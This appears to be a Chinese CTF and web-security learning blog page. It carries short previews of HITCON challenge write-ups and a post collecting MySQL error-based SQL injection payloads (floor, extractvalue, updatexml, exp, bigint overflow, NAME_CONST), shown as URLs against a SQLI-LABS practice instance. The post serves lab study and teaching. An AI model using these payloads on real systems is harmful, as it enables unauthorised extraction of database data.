WEB学习
HITCON 2015 lalala(SSRF)
题目连接:https://github.com/otakekumi/CTF-Challenge/blob/master/PHP/chall_3/index.php
一个文件上传题,尝试上传个图片,结果:
好吧,环境没搭好,这不能怪我了,我只能看源码来搭了。
但是就目前来看似乎可以SSRF.
什么是ssrf?是时候系统的学一波了。
参考链接:
WEB学习
HITCON 2017 babyfirst-revenge-v2(命令执行绕过五)
题目地址:https://github.com/otakekumi/CTF-Challenge/bl 阅读更多…
WEB学习
HITCON 2017 babyfirst-revenge(命令执行绕过三)
今天写了下红帽杯要交的wp,颓废了一会儿,喷了一发iscc,然后ak了iscc目前放的题。开始今天的 阅读更多…
WEB学习
HITCON 2017 babyfirst-revenge(命令执行绕过二)
昨天不知道怎么了忘记发出去了,和今天的合起来一起发23333333 今天国赛,体验了一把被二进制大手 阅读更多…
WEB学习
SQL注入之报错注入的一些随笔
0x00.序言
关于报错注入的话虽然我在我之前的文章里面写了一些,但是sql注入的姿势实在是太多了。之前写过的payload不全也不系统。今天抽出时间来总结一下。
ps:关于报错注入的原理和使用的基本函数我在我之前的文章《SQLI-LABS修炼笔记(二)》中已经详细说过了,如果不懂可以去看看。
ps的ps:这里以SQLI-LABS的LESS-5为例题作为示范。
0x01.floor()报错注入
http://43.247.91.228:84/Less-5/?id=1′ union Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a–+
0x02.extractvalue()报错注入
原理:xpath 函数报错注入
ps:(有长度限制,最长32位)
http://43.247.91.228:84/Less-5/?id=1′ and extractvalue(1,concat(0x7e,(select database()),0x7e))–+
0x03.updatexml()报错注入
ps:(有长度限制,最长32位)
http://43.247.91.228:84/Less-5/?id=1′ and updatexml(1,concat(0x7e,(select database()),0x7e),1)–+
0x04.exp()报错注入
原理:利用double 数值类型超出范围进行报错注入
http://43.247.91.228:84/Less-5/?id=1′ union select (exp(~(select * FROM(SELECT USER())a))),2,3–+
0x05.利用!来溢出报错注入
原理:利用bigint 溢出进行报错注入
http://43.247.91.228:84/Less-5/?id=1′ union select (!(select * from (select user())x) – ~0),2,3–+
0x06.NAME_CONST()
原理:利用数据的重复性。
http://43.247.91.228:84/Less-5/?id=1’union select 1,2,3 from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x –+